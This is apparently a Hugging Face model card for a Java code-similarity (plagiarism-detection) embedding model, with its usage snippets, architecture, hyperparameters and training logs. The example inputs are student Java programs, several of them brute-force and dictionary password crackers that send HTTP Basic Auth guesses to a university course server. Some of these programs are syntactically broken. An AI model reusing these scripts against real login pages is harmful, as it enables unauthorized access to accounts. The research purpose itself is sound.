buelfhood/SOCO_TRAIN_java
Viewer • Updated • 76.5k • 71
How to use buelfhood/SOCO-Java-UnixCoder-Softmax-PairClass-VAST-NoEval with sentence-transformers:
from sentence_transformers import SentenceTransformer
model = SentenceTransformer("buelfhood/SOCO-Java-UnixCoder-Softmax-PairClass-VAST-NoEval")
sentences = [
"\n\nimport java.awt.*;\nimport java.String;\nimport java.util.*;\nimport java.io.*;\nimport java.net.*;\n\n\n\npublic class BruteForce\n{\n private URL url;\n private HttpURLConnection connection ;\n private int stopTime = 0;\n private int startTime = 0;\n private int count = 0;\n\n public BruteForce()\n {\n System.out.println(\"Process is running...\");\n startTime = System.currentTimeMillis();\n threeLetters();\n twoLetters();\n }\n\n public static void main (String args[])\n {\n BruteForce bf = new BruteForce();\n }\n \n public void threeLetters()\n {\n String s1;\n char [] a = {'a','a','a'};\n\n for (int i0 = 0; i0 < 26; i0++)\n {\n for (int i1 = 0; i1 < 26; i1++)\n {\n for (int i2 = 0; i2 < 26; i2++)\n {\n s1 = String.valueOf((char)(a[0] + i0)) + String.valueOf((char)(a[1] + i1)) +\n\t\t String.valueOf((char)(a[2] + i2));\n decision(s1);\n count++;\n\n s1 = String.valueOf((char)(a[0] + i0)) + String.valueOf((char)(a[1] + i1)) +\n (String.valueOf((char)(a[2] + i2))).toUpperCase();\n decision(s1);\n count++;\n\n s1 = String.valueOf((char)(a[0] + i0)) + (String.valueOf((char)(a[1] + i1))).toUpperCase() +\n (String.valueOf((char)(a[2] + i2))).toUpperCase();\n decision(s1);\n count++;\n\n s1 = (String.valueOf((char)(a[0] + i0))).toUpperCase() +\n (String.valueOf((char)(a[1] + i1))).toUpperCase() +\n (String.valueOf((char)(a[2] + i2))).toUpperCase();\n decision(s1);\n count++;\n\n s1 = (String.valueOf((char)(a[0] + i0))) + (String.valueOf((char)(a[1] + i1))).toUpperCase() +\n String.valueOf((char)(a[2] + i2));\n decision(s1);\n count++;\n\n s1 = (String.valueOf((char)(a[0] + i0))).toUpperCase() + String.valueOf((char)(a[1] + i1)) +\n\t\t String.valueOf((char)(a[2] + i2));\n decision(s1);\n count++;\n\n s1 = (String.valueOf((char)(a[0] + i0))).toUpperCase() + String.valueOf((char)(a[1] + i1)) +\n (String.valueOf((char)(a[2] + i2))).toUpperCase();\n decision(s1);\n count++;\n\n s1 = (String.valueOf((char)(a[0] + i0))).toUpperCase() +\n (String.valueOf((char)(a[1] + 
i1))).toUpperCase() + String.valueOf((char)(a[2] + i2));\n decision(s1);\n count++;\n }\n }\n }\n }\n \n public void twoLetters()\n {\n String s1;\n char [] a = {'a','a'};\n\n for (int i0 = 0; i0 < 26; i0++)\n {\n for (int i1 = 0; i1 < 26; i1++)\n {\n s1 = String.valueOf((char)(a[0] + i0)) + String.valueOf((char)(a[1] + i1));\n decision(s1);\n count++;\n\n s1 = String.valueOf((char)(a[0] + i0)) + String.valueOf((char)(a[1] + i1)).toUpperCase();\n decision(s1);\n count++;\n\n s1 = (String.valueOf((char)(a[0] + i0))).toUpperCase() +\n (String.valueOf((char)(a[1] + i1))).toUpperCase();\n decision(s1);\n count++;\n\n s1 = (String.valueOf((char)(a[0] + i0))).toUpperCase() + String.valueOf((char)(a[1] + i1));\n decision(s1);\n count++;\n }\n }\n }\n\n \n public void decision(String s1)\n {\n if (find(s1) == 200)\n {\n stopTime = System.currentTimeMillis();\n runTime = stopTime - startTime;\n System.out.println(\"***************************************\");\n System.out.println(\"\\nAttack successfully\");\n System.out.println(\"\\nPassword is: \" + s1);\n System.out.println(\"\\nThe contents of the Web site: \");\n displayContent(s1);\n System.out.println(\"\\nTime taken crack: \" + runTime + \" millisecond\");\n System.out.println(\"\\nNumber of attempts: \" + count);\n System.out.println();\n\n System.exit(0);\n }\n }\n \n \n public int find(String s1)\n {\n int responseCode = 0;\n try\n {\n url = new URL(\"http://sec-crack.cs.rmit.edu./SEC/2/\");\n connection = (HttpURLConnection)url.openConnection();\n\n connection.setRequestProperty(\"Authorization\",\" \" + MyBase64.encode(\"\" + \":\" + s1));\n\n responseCode = connection.getResponseCode();\n\n }catch (Exception e)\n {\n System.out.println(e.getMessage());\n }\n return responseCode;\n }\n\n \n public void displayContent(String pw)\n {\n BufferedReader bw = null ;\n try\n {\n url = new URL(\"http://sec-crack.cs.rmit.edu./SEC/2/\");\n connection = (HttpURLConnection)url.openConnection();\n\n 
connection.setRequestProperty(\"Authorization\",\" \" + MyBase64.encode(\"\" + \":\" + pw));\n InputStream stream = (InputStream)(connection.getContent());\n if (stream != null)\n {\n InputStreamReader reader = new InputStreamReader (stream);\n bw = new BufferedReader (reader);\n String line;\n\n while ((line = bw.readLine()) != null)\n {\n System.out.println(line);\n }\n }\n }\n catch (IOException e)\n {\n System.out.println(e.getMessage());\n }\n }\n}\n\n\n\n\n",
"\nimport java.io.*;\nimport java.net.Socket;\nimport java.util.*;\n\npublic class Email\n{\n private String hello;\n private String mailFrom=\"\";\n private String mailTo=\"\";\n private String mailData=\"\";\n \n private String subject=\"\";\n private String content=\"\";\n private String follows=\"\";\n private String changeContent=\"\";\n private String stop=\"\";\n private String end=\"\";\n private String line=\"\";\n private InputStream is;\n private BufferedReader bf;\n private OutputStream os;\n private PrintWriter pw;\n public Email(Vector change) throws Exception\n {\n hello= \"HELO mail.rmit.edu.\";\n mailFrom = \"MAIL FROM: @cs.rmit.edu.\";\n mailTo = \"RCPT : @cs.rmit.edu.\";\n mailData = \"DATA\";\n subject=\"Subject: Some changes occur\";\n content=\" is some changes the : http://www.cs.rmit.edu./students/\";\n follows=\"The changes as follows:\";\n for(int i=0;i<change.size();i++)\n changeContent+=change.elementAt(i).toString()+\"\\r\\n\";\n stop =\"\\r\\n.\";\n end=\"QUIT\";\n }\n public void send() throws Exception\n {\n Socket sk = new Socket(\"mail.cs.rmit.edu.\",25);\n is= sk.getInputStream();\n os = sk.getOutputStream();\n pw = new PrintWriter(new OutputStreamWriter(os));\n pw.println(hello);\n pw.println(mailFrom);\n pw.println(mailTo);\n pw.println(mailData);\n pw.println();\n pw.println(subject);\n pw.println(content);\n pw.println(follows);\n pw.println(changeContent);\n pw.println(stop);\n pw.println(end);\n pw.flush();\n pw.get();\n \n }\n}",
"\nimport java.awt.*;\nimport java.awt.event.*;\nimport java.io.*;\nimport java.util.*;\nimport java.net.*;\n\npublic class Dictionary\n{\n private String userPassword;\n private static int counter;\n\n\n\n\n\n public Dictionary(String username)\n {\n String user;\n String password;\n counter = 0;\n user = username;\n\n try\n {\n FileReader fr = new FileReader( \"/usr/share/lib/dict/words\" );\n BufferedReader bf = new BufferedReader( fr );\n\n while ((password = bf.readLine()) != null)\n {\n userPassword = user + \":\" + password;\n\n System.out.print(\".\");\n\n if (password.length() == 3)\n if (doEncoding(userPassword)== true)\n {\n System.out.println(password);\n return;\n }\n\n counter++;\n }\n }\n catch ( IOException ioe )\n {\n System.err.println( ioe.toString() );\n }\n }\n\n\n\n\n private boolean doEncoding(String userPassword)\n {\n String encoding = new misc.BASE64Encoder().encode (userPassword.getBytes());\n return doAttempt(encoding);\n }\n\n\n\n\n\n private boolean doAttempt (String encoding)\n {\n\n try\n {\n URL url = new URL (\"http://sec-crack.cs.rmit.edu./SEC/2/\");\n\n URLConnection uc = url.openConnection();\n uc.setDoInput(true);\n uc.setDoOutput(true);\n\n uc.setRequestProperty (\"Get\", \"/SEC/2/ \" + \"HTTP/1.1\");\n uc.setRequestProperty (\"Host\", \"sec-crack.cs.rmit.edu.\");\n uc.setRequestProperty (\"Authorization\", \" \" + encoding);\n\n return uc.getHeaderField(0).trim().equalsIgnoreCase(\"HTTP/1.1 200 OK\");\n }\n catch (MalformedURLException e)\n {\n System.out.println (\"Invalid URL\");\n }\n catch (IOException e)\n {\n System.out.println (e.toString() );\n }\n\n return false;\n }\n\n\n\n\n\n public static void main(String args[])\n {\n Date sdate = new Date();\n System.out.print(\"Starting the Ditionary Attack at:\" + sdate + \"\\n\");\n\n Dictionary bf = new Dictionary(args[0]);\n\n Date edate = new Date();\n System.out.print(\"Ditionary Attack ends at:\" + sdate + \"\\n\");\n System.out.println(\"Time taken by Dictionary is : 
\" + (edate.getTime() - sdate.getTime())/1000 + \" seconds \\n\");\n System.out.print(\"Attempts in this session:\" + counter + \"\\n\");\n\n }\n}\n\n\n\n\n",
"\n\n\nimport java.text.*; \nimport java.util.*; \nimport java.net.*; \nimport java.io.*; \n\n \npublic class BruteForce { \n\n public int runProcess(String urlString,String passwd) { \n\n int returnval = 0;\n MyAuthenticator auth = new MyAuthenticator(passwd);\n Authenticator.setDefault(auth);\n\n\t System.out.println(\"trying passord: \" + passwd);\n try{\n URL yahoo = new URL(urlString); \n BufferedReader in = new BufferedReader(new InputStreamReader(yahoo.openStream()));\n String inputLine;\n while ((inputLine = in.readLine()) != null) {\n\t System.out.println(inputLine);\n\t System.out.println(\"passord: \" + passwd);\n returnval = 1;\n }\n\t in.close();\n }catch(Exception e){ returnval = 0;}\n return returnval;\n }\n\n public static void main(String argv[]) { \n\n String[] val = \n{\"a\",\"b\",\"c\",\"d\",\"e\",\"f\",\"g\",\"h\",\"i\",\"j\",\"k\",\"l\",\"m\",\"n\",\"o\",\"p\",\"q\",\"r\",\"s\",\"t\",\"u\",\"v\",\"w\",\"x\",\"y\",\"z\",\"A\",\"B\",\"C\",\"D\",\"E\",\"F\",\"G\",\"H\",\"I\",\"J\",\"K\",\"L\",\"M\",\"N\",\"O\",\"P\",\"Q\",\"R\",\"S\",\"T\",\"U\",\"V\",\"W\",\"X\",\"Y\",\"Z\"};\n\n int l1 = 0;\n\n int l2 = 0;\n\n int l3 = 0;\n \n int retval = 0;\n\n String pwd = \"\";\n\n \n BruteForce s = new BruteForce(); \n String urlToSearch = \"http://sec-crack.cs.rmit.edu./SEC/2/\"; \n \n for (int a = 0; a < 52; a++) {\n\n l1 = a;\n\n pwd = val[l1];\n retval = 0;\n retval = s.runProcess(urlToSearch,pwd); \n if (retval > 0) {\n System.exit(0);\n }\n }\n\n\n for (int b = 0; b < 52; b++) {\n l1 = b;\n for (int c = 0; c < 52; c++) {\n\n l2 = c;\n pwd = val[l1]+ val[l2];\n retval = 0;\n retval = s.runProcess(urlToSearch,pwd); \n if (retval > 0) {\n System.exit(0);\n }\n }\n }\n\n\n for (int d = 0; d < 52; d++) {\n l1 = d;\n for (int e = 0; e < 52; e++) {\n l2 = e;\n for (int f = 0; f < 52; f++) {\n\n l3 = f;\n\n pwd = val[l1]+ val[l2]+ val[l3];\n retval = 0;\n retval = s.runProcess(urlToSearch,pwd); \n if (retval > 0) {\n System.exit(0);\n }\n }\n }\n }\n\n } \n} 
\n\n"
]
embeddings = model.encode(sentences)
similarities = model.similarity(embeddings, embeddings)
print(similarities.shape)
# [4, 4]

This is a sentence-transformers model fine-tuned from microsoft/unixcoder-base-unimodal on the soco_train_java dataset. It maps sentences & paragraphs to a 768-dimensional dense vector space and can be used for semantic textual similarity, semantic search, paraphrase mining, text classification, clustering, and more.
SentenceTransformer(
(0): Transformer({'max_seq_length': 512, 'do_lower_case': False}) with Transformer model: RobertaModel
(1): Pooling({'word_embedding_dimension': 768, 'pooling_mode_cls_token': False, 'pooling_mode_mean_tokens': True, 'pooling_mode_max_tokens': False, 'pooling_mode_mean_sqrt_len_tokens': False, 'pooling_mode_weightedmean_tokens': False, 'pooling_mode_lasttoken': False, 'include_prompt': True})
)
First install the Sentence Transformers library:
pip install -U sentence-transformers
Then you can load this model and run inference.
from sentence_transformers import SentenceTransformer
# Download from the 🤗 Hub
model = SentenceTransformer("buelfhood/SOCO-Java-UnixCoder-Softmax-PairClass-VAST-NoEval")
# Run inference
sentences = [
'\n\nimport java.awt.*;\nimport java.awt.event.*;\nimport java.io.*;\nimport java.net.*;\n\npublic class BruteForce extends Frame implements ActionListener {\n\tprivate TextField tf = new TextField();\n private TextArea ta = new TextArea();\n\n \tpublic void actionPerformed (ActionEvent e) {\n\t\tString s = tf.getText();\n\t\tString login="";\n\n\t\tif (s.length() != 0)\n\t\t{\n\t\t\tchar symbol = \'A\';\n\n\t\t\tlogin=":";\n\t\t\t\n\t\t\tfor(int i = 0; i < 3; i++)\n\t\t\t{\n\t\t\t\tsymbol = (char)(57.0 * Math.random() + 65);\n\n\t\t\t\tif(symbol>90 && symbol<97){\n\t\t\t\t\ti--;\n\t\t\t\t\tcontinue;\n\t\t\t\t}\n\t\t\t\tlogin=login+symbol;\n\n\t\t\t}\n\n\t\t ta.setText (fetchURL (s,login));\n\t\t System.out.println("runing"+login);\n\t\t}while(ta.getText().compareTo("Invalid URL")!=0 || ta.getText().compareTo("Error URL")!=0);\n\n\t\tSystem.out.println("The password is: "+login);\n\t}\n\n\tpublic BruteForce() {\n\t\tsuper ("SEC-CRACK");\n\n\t \n\t add (tf, BorderLayout.LEFT);\n\t ta.setEditable(false);\n\t add (ta, BorderLayout.CENTER);\n\t tf.addActionListener (this);\n\n\t addWindowListener (new WindowAdapter() {\n\t public void windowClosing (WindowEvent e) {\n\t dispose();\n\t System.exit(0);\n\t }\n\t });\n\t}\n\n\tprivate String fetchURL (String urlString,String login) {\n\t\tStringWriter sw = new StringWriter();\n\t PrintWriter pw = new PrintWriter();\n\n\t try {\n\t URL url = new URL (urlString);\n\n\t \n\t\n\t \n\n\t \n\t String encoding = new url.misc.BASE64Encoder().encode (login.getBytes());\n\n\t \n\t URLConnection uc = url.openConnection();\n\t uc.setRequestProperty ("Authorization", " " + encoding);\n\t InputStream content = (InputStream)uc.getInputStream();\n\t BufferedReader in =\n\t new BufferedReader (new InputStreamReader (content));\n\t String line;\n\t while ((line = in.readLine()) != null) {\n\t pw.println (line);\n\t }\n\t } catch (MalformedURLException e) {\n\t pw.println ("Invalid URL");\n\t } catch (IOException e) {\n\t pw.println ("Error 
URL");\n\t }\n\t return sw.toString();\n\t}\n\n\n\tpublic static void main(String args[]) {\n\t\tFrame f = new BruteForce();\n\t f.setSize(300, 300);\n\t f.setVisible (true);\n\t}\n}\n\n\n\n\nclass Base64Converter\n{\n\tpublic static final char [ ] alphabet = {\n \'A\', \'B\', \'C\', \'D\', \'E\', \'F\', \'G\', \'H\', \n \'I\', \'J\', \'K\', \'L\', \'M\', \'N\', \'O\', \'P\', \n \'Q\', \'R\', \'S\', \'T\', \'U\', \'V\', \'W\', \'X\', \n \'Y\', \'Z\', \'a\', \'b\', \'c\', \'d\', \'e\', \'f\', \n \'g\', \'h\', \'i\', \'j\', \'k\', \'l\', \'m\', \'n\', \n \'o\', \'p\', \'q\', \'r\', \'s\', \'t\', \'u\', \'v\', \n \'w\', \'x\', \'y\', \'z\', \'0\', \'1\', \'2\', \'3\', \n \'4\', \'5\', \'6\', \'7\', \'8\', \'9\', \'+\', \'/\' }; \n\n\n public static String encode ( String s )\n {\n return encode ( s.getBytes ( ) );\n }\n\n public static String encode ( byte [ ] octetString )\n {\n int bits24;\n int bits6;\n\n char [ ] out\n = new char [ ( ( octetString.length - 1 ) / 3 + 1 ) * 4 ];\n\n int outIndex = 0;\n int i = 0;\n\n while ( ( i + 3 ) <= octetString.length )\n {\n \n bits24 = ( octetString [ i++ ] & 0xFF ) << 16;\n bits24 |= ( octetString [ i++ ] & 0xFF ) << 8;\n bits24 |= ( octetString [ i++ ] & 0xFF ) << 0;\n\n bits6 = ( bits24 & 0x00FC0000 ) >> 18;\n out [ outIndex++ ] = alphabet [ bits6 ];\n bits6 = ( bits24 & 0x0003F000 ) >> 12;\n out [ outIndex++ ] = alphabet [ bits6 ];\n bits6 = ( bits24 & 0x00000FC0 ) >> 6;\n out [ outIndex++ ] = alphabet [ bits6 ];\n bits6 = ( bits24 & 0x0000003F );\n out [ outIndex++ ] = alphabet [ bits6 ];\n }\n\n if ( octetString.length - i == 2 )\n {\n \n bits24 = ( octetString [ i ] & 0xFF ) << 16;\n bits24 |= ( octetString [ i + 1 ] & 0xFF ) << 8;\n\n bits6 = ( bits24 & 0x00FC0000 ) >> 18;\n out [ outIndex++ ] = alphabet [ bits6 ];\n bits6 = ( bits24 & 0x0003F000 ) >> 12;\n out [ outIndex++ ] = alphabet [ bits6 ];\n bits6 = ( bits24 & 0x00000FC0 ) >> 6;\n out [ outIndex++ ] = alphabet [ bits6 ];\n\n \n out [ outIndex++ ] = \'=\';\n 
}\n else if ( octetString.length - i == 1 )\n {\n \n bits24 = ( octetString [ i ] & 0xFF ) << 16;\n\n bits6 = ( bits24 & 0x00FC0000 ) >> 18;\n out [ outIndex++ ] = alphabet [ bits6 ];\n bits6 = ( bits24 & 0x0003F000 ) >> 12;\n out [ outIndex++ ] = alphabet [ bits6 ];\n\n \n out [ outIndex++ ] = \'=\';\n out [ outIndex++ ] = \'=\';\n }\n\n return new String ( out );\n }\n}\n\n',
'\n\nimport java.io.*;\nimport java.text.*;\nimport java.util.*;\nimport java.net.*;\n\npublic class BruteForce extends Thread\n{\n private static final String USERNAME = "";\n private static final char [] POSSIBLE_CHAR =\n {\'a\', \'b\', \'c\', \'d\', \'e\', \'f\', \'g\', \'h\', \'i\', \'j\', \'k\', \'l\', \'m\',\n \'n\', \'o\', \'p\', \'q\', \'r\', \'s\', \'t\', \'u\', \'v\', \'w\', \'x\', \'y\', \'z\',\n \'A\', \'B\', \'C\', \'D\', \'E\', \'F\', \'G\', \'H\', \'I\', \'J\', \'K\', \'L\', \'M\',\n \'N\', \'O\', \'P\', \'Q\', \'R\', \'S\', \'T\', \'U\', \'V\', \'W\', \'X\', \'Y\', \'Z\'};\n private static int NUMBER_OF_THREAD = 500;\n\n private static Date startDate = null;\n private static Date endDate = null;\n\n private String address;\n private String password;\n\n public BruteForce(String address, String password)\n {\n this.address = address;\n this.password = password;\n }\n\n public static void main(String[] args) throws IOException\n {\n if (args.length < 1)\n {\n System.err.println("Invalid usage!");\n System.err.println("Usage: java BruteForce <url>");\n System.exit(1);\n }\n\n try\n {\n brute(args[0], USERNAME);\n }\n catch(Exception e)\n {\n e.printStackTrace();\n System.exit(1);\n }\n }\n\n public static void brute(String address, String user)\n {\n BruteForce [] threads = new BruteForce[NUMBER_OF_THREAD];\n int index = 0;\n\n startDate = new Date();\n for(int i = 0; i < POSSIBLE_CHAR.length; i++)\n {\n for(int j = 0; j < POSSIBLE_CHAR.length; j++)\n {\n for(int k = 0; k < POSSIBLE_CHAR.length; k++)\n {\n String password = ""+POSSIBLE_CHAR[i]+POSSIBLE_CHAR[j]+\n POSSIBLE_CHAR[k];\n\n if (threads[index] != null && threads[index].isAlive())\n {\n try\n {\n threads[index].join();\n }\n catch(InterruptedException e ) {}\n }\n threads[index] = new BruteForce(address, password);\n threads[index].get();\n\n index = (index++) % threads.length;\n }\n }\n }\n }\n\n public void run()\n {\n if (endDate != null)\n return;\n\n try\n {\n\n URLConnection conn = (new 
URL(address)).openConnection();\n conn.setDoInput(true);\n\n if (login(conn, USERNAME, password))\n {\n endDate = new Date();\n System.out.println("Found the password: \\""+password+"\\"!");\n SimpleDateFormat format = new SimpleDateFormat("dd/MM/yyyy HH:mm:");\n System.out.println("Process started at: "+format.format(startDate));\n System.out.println("Process started at: "+format.format(endDate));\n double timeTaken = (double)(endDate.getTime()-startDate.getTime())/60000;\n System.out.println("Time taken: "+timeTaken+" minutes");\n System.exit(0);\n }\n else\n {\n System.out.println("Password: \\""+password+"\\" Failed!");\n return;\n }\n }\n catch(Exception e)\n {\n e.printStackTrace();\n }\n\n }\n\n public static boolean login(URLConnection conn, String user, String pass)\n {\n try\n {\n String encodeAuth = " "+Base64Encoder.encode(user+":"+pass);\n conn.setRequestProperty ("Authorization", encodeAuth);\n conn.connect();\n conn.getInputStream();\n }\n catch(Exception e)\n {\n return false;\n }\n return true;\n }\n}\n\n\n',
'\n\nimport java.net.*;\nimport java.io.*;\n\npublic class Base64Encoder\n{\n private final static char base64Array [] = {\n \'A\', \'B\', \'C\', \'D\', \'E\', \'F\', \'G\', \'H\',\n \'I\', \'J\', \'K\', \'L\', \'M\', \'N\', \'O\', \'P\',\n \'Q\', \'R\', \'S\', \'T\', \'U\', \'V\', \'W\', \'X\',\n \'Y\', \'Z\', \'a\', \'b\', \'c\', \'d\', \'e\', \'f\',\n \'g\', \'h\', \'i\', \'j\', \'k\', \'l\', \'m\', \'n\',\n \'o\', \'p\', \'q\', \'r\', \'s\', \'t\', \'u\', \'v\',\n \'w\', \'x\', \'y\', \'z\', \'0\', \'1\', \'2\', \'3\',\n \'4\', \'5\', \'6\', \'7\', \'8\', \'9\', \'+\', \'/\'\n };\n\n public static String encode (String string)\n {\n String encodedString = "";\n byte bytes [] = string.getBytes ();\n int i = 0;\n int pad = 0;\n while (i < bytes.length)\n {\n byte b1 = bytes [i++];\n byte b2;\n byte b3;\n if (i >= bytes.length)\n {\n b2 = 0;\n b3 = 0;\n pad = 2;\n }\n else\n {\n b2 = bytes [i++];\n if (i >= bytes.length)\n {\n b3 = 0;\n pad = 1;\n }\n else\n b3 = bytes [i++];\n }\n\n byte c1 = (byte)(b1 >> 2);\n byte c2 = (byte)(((b1 & 0x3) << 4) | (b2 >> 4));\n byte c3 = (byte)(((b2 & 0xf) << 2) | (b3 >> 6));\n byte c4 = (byte)(b3 & 0x3f);\n encodedString += base64Array [c1];\n encodedString += base64Array [c2];\n switch (pad)\n {\n case 0:\n encodedString += base64Array [c3];\n encodedString += base64Array [c4];\n break;\n case 1:\n encodedString += base64Array [c3];\n encodedString += "=";\n break;\n case 2:\n encodedString += "==";\n break;\n }\n }\n return encodedString;\n }\n}\n',
]
embeddings = model.encode(sentences)
print(embeddings.shape)
# [3, 768]
# Get the similarity scores for the embeddings
similarities = model.similarity(embeddings, embeddings)
print(similarities.shape)
# [3, 3]
Columns: label, text_1, and text_2

| | label | text_1 | text_2 |
|---|---|---|---|
| type | int | string | string |
| details |
|
|
|
| label | text_1 | text_2 |
|---|---|---|
0 |
|
|
0 |
|
|
0 |
|
|
Loss: SoftmaxLoss

Columns: label, text_1, and text_2

| | label | text_1 | text_2 |
|---|---|---|---|
| type | int | string | string |
| details |
|
|
|
| label | text_1 | text_2 |
|---|---|---|
0 |
|
|
0 |
import java.io.*; |
|
0 |
|
|
Loss: SoftmaxLoss

Non-default hyperparameters:
- per_device_train_batch_size: 16
- num_train_epochs: 1

All hyperparameters:
- overwrite_output_dir: False
- do_predict: False
- eval_strategy: no
- prediction_loss_only: True
- per_device_train_batch_size: 16
- per_device_eval_batch_size: 8
- per_gpu_train_batch_size: None
- per_gpu_eval_batch_size: None
- gradient_accumulation_steps: 1
- eval_accumulation_steps: None
- torch_empty_cache_steps: None
- learning_rate: 5e-05
- weight_decay: 0.0
- adam_beta1: 0.9
- adam_beta2: 0.999
- adam_epsilon: 1e-08
- max_grad_norm: 1.0
- num_train_epochs: 1
- max_steps: -1
- lr_scheduler_type: linear
- lr_scheduler_kwargs: {}
- warmup_ratio: 0.0
- warmup_steps: 0
- log_level: passive
- log_level_replica: warning
- log_on_each_node: True
- logging_nan_inf_filter: True
- save_safetensors: True
- save_on_each_node: False
- save_only_model: False
- restore_callback_states_from_checkpoint: False
- no_cuda: False
- use_cpu: False
- use_mps_device: False
- seed: 42
- data_seed: None
- jit_mode_eval: False
- use_ipex: False
- bf16: False
- fp16: False
- fp16_opt_level: O1
- half_precision_backend: auto
- bf16_full_eval: False
- fp16_full_eval: False
- tf32: None
- local_rank: 0
- ddp_backend: None
- tpu_num_cores: None
- tpu_metrics_debug: False
- debug: []
- dataloader_drop_last: False
- dataloader_num_workers: 0
- dataloader_prefetch_factor: None
- past_index: -1
- disable_tqdm: False
- remove_unused_columns: True
- label_names: None
- load_best_model_at_end: False
- ignore_data_skip: False
- fsdp: []
- fsdp_min_num_params: 0
- fsdp_config: {'min_num_params': 0, 'xla': False, 'xla_fsdp_v2': False, 'xla_fsdp_grad_ckpt': False}
- fsdp_transformer_layer_cls_to_wrap: None
- accelerator_config: {'split_batches': False, 'dispatch_batches': None, 'even_batches': True, 'use_seedable_sampler': True, 'non_blocking': False, 'gradient_accumulation_kwargs': None}
- deepspeed: None
- label_smoothing_factor: 0.0
- optim: adamw_torch
- optim_args: None
- adafactor: False
- group_by_length: False
- length_column_name: length
- ddp_find_unused_parameters: None
- ddp_bucket_cap_mb: None
- ddp_broadcast_buffers: False
- dataloader_pin_memory: True
- dataloader_persistent_workers: False
- skip_memory_metrics: True
- use_legacy_prediction_loop: False
- push_to_hub: False
- resume_from_checkpoint: None
- hub_model_id: None
- hub_strategy: every_save
- hub_private_repo: None
- hub_always_push: False
- gradient_checkpointing: False
- gradient_checkpointing_kwargs: None
- include_inputs_for_metrics: False
- include_for_metrics: []
- eval_do_concat_batches: True
- fp16_backend: auto
- push_to_hub_model_id: None
- push_to_hub_organization: None
- mp_parameters:
- auto_find_batch_size: False
- full_determinism: False
- torchdynamo: None
- ray_scope: last
- ddp_timeout: 1800
- torch_compile: False
- torch_compile_backend: None
- torch_compile_mode: None
- include_tokens_per_second: False
- include_num_input_tokens_seen: False
- neftune_noise_alpha: None
- optim_target_modules: None
- batch_eval_metrics: False
- eval_on_start: False
- use_liger_kernel: False
- eval_use_gather_object: False
- average_tokens_across_devices: False
- prompts: None
- batch_sampler: batch_sampler
- multi_dataset_batch_sampler: proportional

Training logs:

| Epoch | Step | Training Loss |
|---|---|---|
| 0.2393 | 500 | 0.0179 |
| 0.4787 | 1000 | 0.0231 |
| 0.7180 | 1500 | 0.0166 |
| 0.9574 | 2000 | 0.0149 |
@inproceedings{reimers-2019-sentence-bert,
title = "Sentence-BERT: Sentence Embeddings using Siamese BERT-Networks",
author = "Reimers, Nils and Gurevych, Iryna",
booktitle = "Proceedings of the 2019 Conference on Empirical Methods in Natural Language Processing",
month = "11",
year = "2019",
publisher = "Association for Computational Linguistics",
url = "https://arxiv.org/abs/1908.10084",
}
Base model
microsoft/unixcoder-base-unimodal